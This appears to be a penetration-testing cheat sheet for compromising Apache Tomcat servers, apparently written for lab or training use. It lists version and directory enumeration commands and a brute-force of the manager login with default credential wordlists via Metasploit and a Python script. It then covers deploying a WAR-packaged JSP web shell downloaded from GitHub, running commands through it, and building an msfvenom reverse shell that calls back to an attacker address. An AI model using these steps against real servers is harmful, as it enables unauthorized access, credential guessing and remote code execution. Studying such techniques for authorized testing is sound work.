Tomcat

Footprinting & Enumeration

# Finding Version
curl -s <http://site.local:8080/docs/> | grep Tomcat

# Important files adn folders to look for information
tomcat-users.xml
web.xml

/manager
/host-manager

Gobuster

# Directory Busting
gobuster dir -u http:/site.local:8180/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt

Attacking

Brute Forcing

# Tomcat Manager - Login Brute Force
# Metasploit 
use auxiliary/scanner/http/tomcat_mgr_login
set VHOST web01.inlanefreight.local
set RPORT 8180
set stop_on_success true
set rhosts ip

# Python Script
# LINK : <https://github.com/b33lz3bub-1/Tomcat-Manager-Bruteforce>
python3 mgr_brute.py -U <http://site.local:8180/> -P /manager -u /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt -p /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt

Code Execution

# If we have Valid credentials, browse to <http://site:8180/manager/html>
# Uplaod WAR file containing java web shell
wget <https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp>
zip -r backup.war cmd.jsp

# Execute Commands
curl <http://site:8180/backup/cmd.jsp?cmd=id>

# OR use msfvenom to create a war reverse shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.15 LPORT=4443 -f war > backup.war

# OR we can use multi/http/tomcat_mgr_upload metasploit module to automatate the process

PreviousServlet Containers/Software Development NextJenkins

Last updated 1 year ago